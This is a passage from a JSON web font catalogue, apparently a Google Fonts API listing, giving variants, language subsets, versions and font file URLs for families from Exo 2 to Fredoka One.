        "600": "http://fonts.gstatic.com/s/exo2/v9/7cH1v4okm5zmbvwkAx_sfcEuiD8jYPWcPtq-rpvLpQ.ttf",
        "700": "http://fonts.gstatic.com/s/exo2/v9/7cH1v4okm5zmbvwkAx_sfcEuiD8jWfWcPtq-rpvLpQ.ttf",
        "800": "http://fonts.gstatic.com/s/exo2/v9/7cH1v4okm5zmbvwkAx_sfcEuiD8jPvWcPtq-rpvLpQ.ttf",
        "900": "http://fonts.gstatic.com/s/exo2/v9/7cH1v4okm5zmbvwkAx_sfcEuiD8jF_WcPtq-rpvLpQ.ttf",
        "100italic": "http://fonts.gstatic.com/s/exo2/v9/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drF0fNC6jJ7bpQBL.ttf",
        "200italic": "http://fonts.gstatic.com/s/exo2/v9/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drH0fdC6jJ7bpQBL.ttf",
        "300italic": "http://fonts.gstatic.com/s/exo2/v9/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drEqfdC6jJ7bpQBL.ttf",
        "italic": "http://fonts.gstatic.com/s/exo2/v9/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drF0fdC6jJ7bpQBL.ttf",
        "500italic": "http://fonts.gstatic.com/s/exo2/v9/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drFGfdC6jJ7bpQBL.ttf",
        "600italic": "http://fonts.gstatic.com/s/exo2/v9/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drGqetC6jJ7bpQBL.ttf",
        "700italic": "http://fonts.gstatic.com/s/exo2/v9/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drGTetC6jJ7bpQBL.ttf",
        "800italic": "http://fonts.gstatic.com/s/exo2/v9/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drH0etC6jJ7bpQBL.ttf",
        "900italic": "http://fonts.gstatic.com/s/exo2/v9/7cH3v4okm5zmbtYtMeA0FKq0Jjg2drHdetC6jJ7bpQBL.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Expletus Sans",
      "variants": [
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v14",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/expletussans/v14/RLp5K5v5_bqufTYdnhFzDj2dRfkSu6EuTHo.ttf",
        "italic": "http://fonts.gstatic.com/s/expletussans/v14/RLpnK5v5_bqufTYdnhFzDj2ddfsYv4MrXHrRDA.ttf",
        "500": "http://fonts.gstatic.com/s/expletussans/v14/RLpkK5v5_bqufTYdnhFzDj2dfQ07n6kFUHPIFaU.ttf",
        "500italic": "http://fonts.gstatic.com/s/expletussans/v14/RLpiK5v5_bqufTYdnhFzDj2ddfsgS6oPVFHNBaVImA.ttf",
        "600": "http://fonts.gstatic.com/s/expletussans/v14/RLpkK5v5_bqufTYdnhFzDj2dfSE8n6kFUHPIFaU.ttf",
        "600italic": "http://fonts.gstatic.com/s/expletussans/v14/RLpiK5v5_bqufTYdnhFzDj2ddfsgZ60PVFHNBaVImA.ttf",
        "700": "http://fonts.gstatic.com/s/expletussans/v14/RLpkK5v5_bqufTYdnhFzDj2dfUU9n6kFUHPIFaU.ttf",
        "700italic": "http://fonts.gstatic.com/s/expletussans/v14/RLpiK5v5_bqufTYdnhFzDj2ddfsgA6wPVFHNBaVImA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Fahkwang",
      "variants": [
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v4",
      "lastModified": "2020-07-23",
      "files": {
        "200": "http://fonts.gstatic.com/s/fahkwang/v4/Noa26Uj3zpmBOgbNpOJHmZlRFipxkwjx.ttf",
        "200italic": "http://fonts.gstatic.com/s/fahkwang/v4/Noa06Uj3zpmBOgbNpOqNgHFQHC5Tlhjxdw4.ttf",
        "300": "http://fonts.gstatic.com/s/fahkwang/v4/Noa26Uj3zpmBOgbNpOIjmplRFipxkwjx.ttf",
        "300italic": "http://fonts.gstatic.com/s/fahkwang/v4/Noa06Uj3zpmBOgbNpOqNgBVTHC5Tlhjxdw4.ttf",
        "regular": "http://fonts.gstatic.com/s/fahkwang/v4/Noax6Uj3zpmBOgbNpNqPsr1ZPTZ4.ttf",
        "italic": "http://fonts.gstatic.com/s/fahkwang/v4/Noa36Uj3zpmBOgbNpOqNuLl7OCZ4ihE.ttf",
        "500": "http://fonts.gstatic.com/s/fahkwang/v4/Noa26Uj3zpmBOgbNpOJ7m5lRFipxkwjx.ttf",
        "500italic": "http://fonts.gstatic.com/s/fahkwang/v4/Noa06Uj3zpmBOgbNpOqNgE1SHC5Tlhjxdw4.ttf",
        "600": "http://fonts.gstatic.com/s/fahkwang/v4/Noa26Uj3zpmBOgbNpOJXnJlRFipxkwjx.ttf",
        "600italic": "http://fonts.gstatic.com/s/fahkwang/v4/Noa06Uj3zpmBOgbNpOqNgGFVHC5Tlhjxdw4.ttf",
        "700": "http://fonts.gstatic.com/s/fahkwang/v4/Noa26Uj3zpmBOgbNpOIznZlRFipxkwjx.ttf",
        "700italic": "http://fonts.gstatic.com/s/fahkwang/v4/Noa06Uj3zpmBOgbNpOqNgAVUHC5Tlhjxdw4.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Fanwood Text",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/fanwoodtext/v10/3XFtErwl05Ad_vSCF6Fq7xXGRdbY1P1Sbg.ttf",
        "italic": "http://fonts.gstatic.com/s/fanwoodtext/v10/3XFzErwl05Ad_vSCF6Fq7xX2R9zc9vhCblye.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Farro",
      "variants": [
        "300",
        "regular",
        "500",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "300": "http://fonts.gstatic.com/s/farro/v2/i7dJIFl3byGNHa3hNJ6-WkJUQUq7.ttf",
        "regular": "http://fonts.gstatic.com/s/farro/v2/i7dEIFl3byGNHZVNHLq2cV5d.ttf",
        "500": "http://fonts.gstatic.com/s/farro/v2/i7dJIFl3byGNHa25NZ6-WkJUQUq7.ttf",
        "700": "http://fonts.gstatic.com/s/farro/v2/i7dJIFl3byGNHa3xM56-WkJUQUq7.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Farsan",
      "variants": [
        "regular"
      ],
      "subsets": [
        "gujarati",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/farsan/v6/VEMwRoJ0vY_zsyz62q-pxDX9rQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Fascinate",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/fascinate/v9/z7NWdRrufC8XJK0IIEli1LbQRPyNrw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Fascinate Inline",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/fascinateinline/v10/jVyR7mzzB3zc-jp6QCAu60poNqIy1g3CfRXxWZQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Faster One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/fasterone/v12/H4ciBXCHmdfClFb-vWhfyLuShq63czE.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Fasthand",
      "variants": [
        "regular"
      ],
      "subsets": [
        "khmer"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/fasthand/v11/0yb9GDohyKTYn_ZEESkuYkw2rQg1.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Fauna One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/faunaone/v8/wlpzgwTPBVpjpCuwkuEx2UxLYClOCg.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Faustina",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "italic",
        "500italic",
        "600italic",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v7",
      "lastModified": "2020-06-26",
      "files": {
        "regular": "http://fonts.gstatic.com/s/faustina/v7/XLY4IZPxYpJfTbZAFXWzNT2SO8wpWHlsgoEvGVWWe8tbEg.ttf",
        "500": "http://fonts.gstatic.com/s/faustina/v7/XLY4IZPxYpJfTbZAFXWzNT2SO8wpWHlssIEvGVWWe8tbEg.ttf",
        "600": "http://fonts.gstatic.com/s/faustina/v7/XLY4IZPxYpJfTbZAFXWzNT2SO8wpWHlsXIYvGVWWe8tbEg.ttf",
        "700": "http://fonts.gstatic.com/s/faustina/v7/XLY4IZPxYpJfTbZAFXWzNT2SO8wpWHlsZYYvGVWWe8tbEg.ttf",
        "italic": "http://fonts.gstatic.com/s/faustina/v7/XLY2IZPxYpJfTbZAFV-6B8JKUqez9n55SsLHWl-SWc5LEnoF.ttf",
        "500italic": "http://fonts.gstatic.com/s/faustina/v7/XLY2IZPxYpJfTbZAFV-6B8JKUqez9n55SsL1Wl-SWc5LEnoF.ttf",
        "600italic": "http://fonts.gstatic.com/s/faustina/v7/XLY2IZPxYpJfTbZAFV-6B8JKUqez9n55SsIZXV-SWc5LEnoF.ttf",
        "700italic": "http://fonts.gstatic.com/s/faustina/v7/XLY2IZPxYpJfTbZAFV-6B8JKUqez9n55SsIgXV-SWc5LEnoF.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Federant",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v13",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/federant/v13/2sDdZGNfip_eirT0_U0jRUG0AqUc.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Federo",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/federo/v12/iJWFBX-cbD_ETsbmjVOe2WTG7Q.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Felipa",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v7",
      "lastModified": "2020-07-15",
      "files": {
        "regular": "http://fonts.gstatic.com/s/felipa/v7/FwZa7-owz1Eu4F_wSNSEwM2zpA.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Fenix",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/fenix/v8/XoHo2YL_S7-g5ostKzAFvs8o.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Finger Paint",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/fingerpaint/v10/0QInMXVJ-o-oRn_7dron8YWO85bS8ANesw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Fira Code",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-06-26",
      "files": {
        "300": "http://fonts.gstatic.com/s/firacode/v9/uU9eCBsR6Z2vfE9aq3bL0fxyUs4tcw4W_GNsFVfxN87gsj0.ttf",
        "regular": "http://fonts.gstatic.com/s/firacode/v9/uU9eCBsR6Z2vfE9aq3bL0fxyUs4tcw4W_D1sFVfxN87gsj0.ttf",
        "500": "http://fonts.gstatic.com/s/firacode/v9/uU9eCBsR6Z2vfE9aq3bL0fxyUs4tcw4W_A9sFVfxN87gsj0.ttf",
        "600": "http://fonts.gstatic.com/s/firacode/v9/uU9eCBsR6Z2vfE9aq3bL0fxyUs4tcw4W_ONrFVfxN87gsj0.ttf",
        "700": "http://fonts.gstatic.com/s/firacode/v9/uU9eCBsR6Z2vfE9aq3bL0fxyUs4tcw4W_NprFVfxN87gsj0.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Fira Mono",
      "variants": [
        "regular",
        "500",
        "700"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/firamono/v9/N0bX2SlFPv1weGeLZDtQIfTTkdbJYA.ttf",
        "500": "http://fonts.gstatic.com/s/firamono/v9/N0bS2SlFPv1weGeLZDto1d33mf3VaZBRBQ.ttf",
        "700": "http://fonts.gstatic.com/s/firamono/v9/N0bS2SlFPv1weGeLZDtondv3mf3VaZBRBQ.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Fira Sans",
      "variants": [
        "100",
        "100italic",
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v10",
      "lastModified": "2019-07-22",
      "files": {
        "100": "http://fonts.gstatic.com/s/firasans/v10/va9C4kDNxMZdWfMOD5Vn9IjOazP3dUTP.ttf",
        "100italic": "http://fonts.gstatic.com/s/firasans/v10/va9A4kDNxMZdWfMOD5VvkrCqYTfVcFTPj0s.ttf",
        "200": "http://fonts.gstatic.com/s/firasans/v10/va9B4kDNxMZdWfMOD5VnWKnuQR37fF3Wlg.ttf",
        "200italic": "http://fonts.gstatic.com/s/firasans/v10/va9f4kDNxMZdWfMOD5VvkrAGQBf_XljGllLX.ttf",
        "300": "http://fonts.gstatic.com/s/firasans/v10/va9B4kDNxMZdWfMOD5VnPKruQR37fF3Wlg.ttf",
        "300italic": "http://fonts.gstatic.com/s/firasans/v10/va9f4kDNxMZdWfMOD5VvkrBiQxf_XljGllLX.ttf",
        "regular": "http://fonts.gstatic.com/s/firasans/v10/va9E4kDNxMZdWfMOD5VfkILKSTbndQ.ttf",
        "italic": "http://fonts.gstatic.com/s/firasans/v10/va9C4kDNxMZdWfMOD5VvkojOazP3dUTP.ttf",
        "500": "http://fonts.gstatic.com/s/firasans/v10/va9B4kDNxMZdWfMOD5VnZKvuQR37fF3Wlg.ttf",
        "500italic": "http://fonts.gstatic.com/s/firasans/v10/va9f4kDNxMZdWfMOD5VvkrA6Qhf_XljGllLX.ttf",
        "600": "http://fonts.gstatic.com/s/firasans/v10/va9B4kDNxMZdWfMOD5VnSKzuQR37fF3Wlg.ttf",
        "600italic": "http://fonts.gstatic.com/s/firasans/v10/va9f4kDNxMZdWfMOD5VvkrAWRRf_XljGllLX.ttf",
        "700": "http://fonts.gstatic.com/s/firasans/v10/va9B4kDNxMZdWfMOD5VnLK3uQR37fF3Wlg.ttf",
        "700italic": "http://fonts.gstatic.com/s/firasans/v10/va9f4kDNxMZdWfMOD5VvkrByRBf_XljGllLX.ttf",
        "800": "http://fonts.gstatic.com/s/firasans/v10/va9B4kDNxMZdWfMOD5VnMK7uQR37fF3Wlg.ttf",
        "800italic": "http://fonts.gstatic.com/s/firasans/v10/va9f4kDNxMZdWfMOD5VvkrBuRxf_XljGllLX.ttf",
        "900": "http://fonts.gstatic.com/s/firasans/v10/va9B4kDNxMZdWfMOD5VnFK_uQR37fF3Wlg.ttf",
        "900italic": "http://fonts.gstatic.com/s/firasans/v10/va9f4kDNxMZdWfMOD5VvkrBKRhf_XljGllLX.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Fira Sans Condensed",
      "variants": [
        "100",
        "100italic",
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v4",
      "lastModified": "2019-07-17",
      "files": {
        "100": "http://fonts.gstatic.com/s/firasanscondensed/v4/wEOjEADFm8hSaQTFG18FErVhsC9x-tarWZXtqOlQfx9CjA.ttf",
        "100italic": "http://fonts.gstatic.com/s/firasanscondensed/v4/wEOtEADFm8hSaQTFG18FErVhsC9x-tarUfPVzONUXRpSjJcu.ttf",
        "200": "http://fonts.gstatic.com/s/firasanscondensed/v4/wEOsEADFm8hSaQTFG18FErVhsC9x-tarWTnMiMN-cxZblY4.ttf",
        "200italic": "http://fonts.gstatic.com/s/firasanscondensed/v4/wEOuEADFm8hSaQTFG18FErVhsC9x-tarUfPVYMJ0dzRehY43EA.ttf",
        "300": "http://fonts.gstatic.com/s/firasanscondensed/v4/wEOsEADFm8hSaQTFG18FErVhsC9x-tarWV3PiMN-cxZblY4.ttf",
        "300italic": "http://fonts.gstatic.com/s/firasanscondensed/v4/wEOuEADFm8hSaQTFG18FErVhsC9x-tarUfPVBMF0dzRehY43EA.ttf",
        "regular": "http://fonts.gstatic.com/s/firasanscondensed/v4/wEOhEADFm8hSaQTFG18FErVhsC9x-tarYfHnrMtVbx8.ttf",
        "italic": "http://fonts.gstatic.com/s/firasanscondensed/v4/wEOjEADFm8hSaQTFG18FErVhsC9x-tarUfPtqOlQfx9CjA.ttf",
        "500": "http://fonts.gstatic.com/s/firasanscondensed/v4/wEOsEADFm8hSaQTFG18FErVhsC9x-tarWQXOiMN-cxZblY4.ttf",
        "500italic": "http://fonts.gstatic.com/s/firasanscondensed/v4/wEOuEADFm8hSaQTFG18FErVhsC9x-tarUfPVXMB0dzRehY43EA.ttf",
        "600": "http://fonts.gstatic.com/s/firasanscondensed/v4/wEOsEADFm8hSaQTFG18FErVhsC9x-tarWSnJiMN-cxZblY4.ttf",
        "600italic": "http://fonts.gstatic.com/s/firasanscondensed/v4/wEOuEADFm8hSaQTFG18FErVhsC9x-tarUfPVcMd0dzRehY43EA.ttf",
        "700": "http://fonts.gstatic.com/s/firasanscondensed/v4/wEOsEADFm8hSaQTFG18FErVhsC9x-tarWU3IiMN-cxZblY4.ttf",
        "700italic": "http://fonts.gstatic.com/s/firasanscondensed/v4/wEOuEADFm8hSaQTFG18FErVhsC9x-tarUfPVFMZ0dzRehY43EA.ttf",
        "800": "http://fonts.gstatic.com/s/firasanscondensed/v4/wEOsEADFm8hSaQTFG18FErVhsC9x-tarWVHLiMN-cxZblY4.ttf",
        "800italic": "http://fonts.gstatic.com/s/firasanscondensed/v4/wEOuEADFm8hSaQTFG18FErVhsC9x-tarUfPVCMV0dzRehY43EA.ttf",
        "900": "http://fonts.gstatic.com/s/firasanscondensed/v4/wEOsEADFm8hSaQTFG18FErVhsC9x-tarWXXKiMN-cxZblY4.ttf",
        "900italic": "http://fonts.gstatic.com/s/firasanscondensed/v4/wEOuEADFm8hSaQTFG18FErVhsC9x-tarUfPVLMR0dzRehY43EA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Fira Sans Extra Condensed",
      "variants": [
        "100",
        "100italic",
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v4",
      "lastModified": "2019-07-17",
      "files": {
        "100": "http://fonts.gstatic.com/s/firasansextracondensed/v4/NaPMcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3Zyuv1WarE9ncg.ttf",
        "100italic": "http://fonts.gstatic.com/s/firasansextracondensed/v4/NaPOcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqW21-ejkp3cn22.ttf",
        "200": "http://fonts.gstatic.com/s/firasansextracondensed/v4/NaPPcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3TCPn3-0oEZ-a2Q.ttf",
        "200italic": "http://fonts.gstatic.com/s/firasansextracondensed/v4/NaPxcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqWd36-pGR7e2SvJQ.ttf",
        "300": "http://fonts.gstatic.com/s/firasansextracondensed/v4/NaPPcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3VSMn3-0oEZ-a2Q.ttf",
        "300italic": "http://fonts.gstatic.com/s/firasansextracondensed/v4/NaPxcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqWE32-pGR7e2SvJQ.ttf",
        "regular": "http://fonts.gstatic.com/s/firasansextracondensed/v4/NaPKcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda5fiku3efvE8.ttf",
        "italic": "http://fonts.gstatic.com/s/firasansextracondensed/v4/NaPMcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fquv1WarE9ncg.ttf",
        "500": "http://fonts.gstatic.com/s/firasansextracondensed/v4/NaPPcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3QyNn3-0oEZ-a2Q.ttf",
        "500italic": "http://fonts.gstatic.com/s/firasansextracondensed/v4/NaPxcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqWS3y-pGR7e2SvJQ.ttf",
        "600": "http://fonts.gstatic.com/s/firasansextracondensed/v4/NaPPcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3SCKn3-0oEZ-a2Q.ttf",
        "600italic": "http://fonts.gstatic.com/s/firasansextracondensed/v4/NaPxcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqWZ3u-pGR7e2SvJQ.ttf",
        "700": "http://fonts.gstatic.com/s/firasansextracondensed/v4/NaPPcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3USLn3-0oEZ-a2Q.ttf",
        "700italic": "http://fonts.gstatic.com/s/firasansextracondensed/v4/NaPxcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqWA3q-pGR7e2SvJQ.ttf",
        "800": "http://fonts.gstatic.com/s/firasansextracondensed/v4/NaPPcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3ViIn3-0oEZ-a2Q.ttf",
        "800italic": "http://fonts.gstatic.com/s/firasansextracondensed/v4/NaPxcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqWH3m-pGR7e2SvJQ.ttf",
        "900": "http://fonts.gstatic.com/s/firasansextracondensed/v4/NaPPcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3XyJn3-0oEZ-a2Q.ttf",
        "900italic": "http://fonts.gstatic.com/s/firasansextracondensed/v4/NaPxcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqWO3i-pGR7e2SvJQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Fjalla One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-10",
      "files": {
        "regular": "http://fonts.gstatic.com/s/fjallaone/v8/Yq6R-LCAWCX3-6Ky7FAFnOZwkxgtUb8.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Fjord One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/fjordone/v9/zOL-4pbEnKBY_9S1jNKr6e5As-FeiQ.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Flamenco",
      "variants": [
        "300",
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "300": "http://fonts.gstatic.com/s/flamenco/v11/neIPzCehqYguo67ssZ0qNIkyepH9qGsf.ttf",
        "regular": "http://fonts.gstatic.com/s/flamenco/v11/neIIzCehqYguo67ssaWGHK06UY30.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Flavors",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/flavors/v10/FBV2dDrhxqmveJTpbkzlNqkG9UY.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Fondamento",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/fondamento/v11/4UaHrEJGsxNmFTPDnkaJx63j5pN1MwI.ttf",
        "italic": "http://fonts.gstatic.com/s/fondamento/v11/4UaFrEJGsxNmFTPDnkaJ96_p4rFwIwJePw.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Fontdiner Swanky",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/fontdinerswanky/v11/ijwOs4XgRNsiaI5-hcVb4hQgMvCD4uEfKiGvxts.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Forum",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/forum/v11/6aey4Ky-Vb8Ew_IWMJMa3mnT.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Francois One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v15",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/francoisone/v15/_Xmr-H4zszafZw3A-KPSZutNxgKQu_avAg.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Frank Ruhl Libre",
      "variants": [
        "300",
        "regular",
        "500",
        "700",
        "900"
      ],
      "subsets": [
        "hebrew",
        "latin",
        "latin-ext"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "300": "http://fonts.gstatic.com/s/frankruhllibre/v6/j8_36_fAw7jrcalD7oKYNX0QfAnPUxvHxJDMhYeIHw8.ttf",
        "regular": "http://fonts.gstatic.com/s/frankruhllibre/v6/j8_w6_fAw7jrcalD7oKYNX0QfAnPa7fv4JjnmY4.ttf",
        "500": "http://fonts.gstatic.com/s/frankruhllibre/v6/j8_36_fAw7jrcalD7oKYNX0QfAnPU0PGxJDMhYeIHw8.ttf",
        "700": "http://fonts.gstatic.com/s/frankruhllibre/v6/j8_36_fAw7jrcalD7oKYNX0QfAnPUwvAxJDMhYeIHw8.ttf",
        "900": "http://fonts.gstatic.com/s/frankruhllibre/v6/j8_36_fAw7jrcalD7oKYNX0QfAnPUzPCxJDMhYeIHw8.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Freckle Face",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/freckleface/v9/AMOWz4SXrmKHCvXTohxY-YI0U1K2w9lb4g.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Fredericka the Great",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/frederickathegreat/v10/9Bt33CxNwt7aOctW2xjbCstzwVKsIBVV-9Skz7Ylch2L.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Fredoka One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
